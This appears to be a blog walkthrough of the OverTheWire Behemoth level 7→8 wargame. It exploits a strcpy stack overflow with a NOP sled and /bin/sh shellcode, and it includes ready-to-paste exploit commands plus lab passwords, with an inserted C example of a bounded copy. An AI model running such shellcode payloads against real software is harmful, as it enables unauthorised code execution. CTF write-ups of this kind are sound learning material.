Part time CTF Player learn every day!!
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Behemoth Level 7 → 8 tutorial!!

Login

Log in as behemoth7 using the password you obtained from Level 6 → 7.

ssh behemoth7@behemoth.labs.overthewire.org -p 2221
# password: baquxouafo

Task

The binary /behemoth/behemoth7 zeroes out all environment variables, so the usual “ret2env shellcode” trick won’t work anymore. Instead, we must inject our own shellcode directly as program input, use a NOP sled, and overwrite EIP with a guessed return address that lands in the sled.


A little bit of Theory

  • No env shellcode: Normally we put shellcode into $SHELLCODE env var, but here the binary clears them.
  • Direct input injection: Our input buffer → payload (padding + shellcode).
  • NOP sled: A large sequence of \x90 (no-op). Even if the return address guess is slightly wrong, CPU “slides” into the shellcode.
  • Overflow mechanics: Overflow buffer (528 A’s) → overwrite EIP with address inside the sled.
  • Little endian: Always reverse the byte order when writing an address into the payload (0xffffd7e0 → \xe0\xd7\xff\xff).
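To show the bug class behind this level from the defender's side, here is an added C example (not the behemoth7 source, whose buffer size and exact code the page does not show): the unbounded strcpy pattern that ltrace reveals, next to a bounded copy that refuses over-long input instead of overwriting the saved return address. BUF_SIZE, wipe_environment and the helper names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* assumed buffer size; the real binary's is not shown on the page */

extern char **environ;

/* Environment wipe of the kind the writeup describes (shape assumed): it removes the
 * ret2env shellcode carrier but does nothing about the overflow itself. */
void wipe_environment(void) {
    for (char **e = environ; e != NULL && *e != NULL; e++)
        memset(*e, 0, strlen(*e));
}

/* Vulnerable pattern that ltrace exposes: argv[1] copied with strcpy and no bound.
 * Anything longer than BUF_SIZE-1 bytes runs past buf into the saved frame pointer and
 * return address (the 528-byte offset found in the writeup). Shown for contrast only. */
void copy_arg_vulnerable(const char *arg) {
    char buf[BUF_SIZE];
    strcpy(buf, arg);   /* BUG: unbounded copy into a fixed-size stack buffer */
}

/* Hardened version: refuse input that does not fit rather than truncating silently.
 * Returns 0 on success, -1 when no terminating NUL is found within out_len bytes. */
int copy_arg_safe(const char *arg, char *out, size_t out_len) {
    size_t n = 0;
    while (n < out_len && arg[n] != '\0')
        n++;
    if (n == out_len)
        return -1;                /* too long: would overflow out */
    memcpy(out, arg, n + 1);      /* copies the NUL as well */
    return 0;
}

/* Helpers that feed the writeup's two inputs: a constructed 600-byte run of 'A' and "AAAA". */
int safe_rejects_600_As(void) {
    char arg[601], out[BUF_SIZE];
    memset(arg, 'A', 600);
    arg[600] = '\0';
    return copy_arg_safe(arg, out, sizeof out);    /* -1: rejected */
}
int safe_accepts_short(void) {
    char out[BUF_SIZE];
    return copy_arg_safe("AAAA", out, sizeof out); /* 0: fits */
}

int main(void) {
    printf("600 A's: %d, AAAA: %d\n", safe_rejects_600_As(), safe_accepts_short());
    return 0;
}
```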

Solution

  1. Baseline test

    ./behemoth7
    # no output, just returns
    

    With argument:

    ./behemoth7 AAAA
    # still no output
    

    → Suspicious. Let’s ltrace it.

  2. Trace with arguments

    ltrace ./behemoth7 AAAA
    

    You’ll see strcpy copying the argument into a stack buffer with no length check → vulnerable.

    All environment vars are cleared (memset), so we can’t use $SHELLCODE. We must inject shellcode directly.

  3. Overflow test

    gdb -q ./behemoth7
    (gdb) run $(python -c "print 600 * 'A'")
    

    → Segfault at 0x41414141 ✅ we control EIP.

  4. Find exact offset

    (gdb) run $(python -c "print 528 * 'A' + 'BBBB'")
    

    → EIP = 0x42424242 → offset confirmed: 528 bytes.

  5. Build payload with NOP sled + shellcode

    python -c 'print "A"*528 + "BBBB" + "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68" + "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'
    

    (classic /bin/sh shellcode)

  6. Find a return address inside sled

    After running payload inside gdb, dump stack:

    x/500wx $esp
    

    You’ll see sled at e.g. 0xffffd7e0.

  7. Exploit

    Use 0xffffd7e0 as RET:

    ./behemoth7 $(python -c "print 528 * 'A' + '\xe0\xd7\xff\xff' + '\x90'*200 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'")
    

    → Shell popped.

  8. Grab password

    whoami
    # behemoth8
    cat /etc/behemoth_pass/behemoth8
    

    Result:

    pheewij7Ae
    

Password

pheewij7Ae

Troubleshooting

  • Segfault but no shell → your RET missed the sled. Re-run gdb, pick an address inside the \x90 block.
  • Wrong offset → ensure EIP becomes 0x42424242 with test payload.
  • Non-alphanumeric restriction → some binaries filter out non-alphanumeric or non-printable bytes. Here the argument is taken raw, so classic shellcode works.
  • Environment cleared → don’t waste time with $SHELLCODE. Direct input only.

Copy-paste quick run (one shot)

ssh behemoth7@behemoth.labs.overthewire.org -p 2221
# password: baquxouafo

cd /behemoth

# Exploit with offset, RET and sled
./behemoth7 $(python -c "print 528 * 'A' + '\xe0\xd7\xff\xff' + '\x90'*200 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'")

whoami
cat /etc/behemoth_pass/behemoth8

Congrats 🎉 You bypassed the env wipe, injected shellcode directly with a NOP sled, and escalated to behemoth8!


Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨
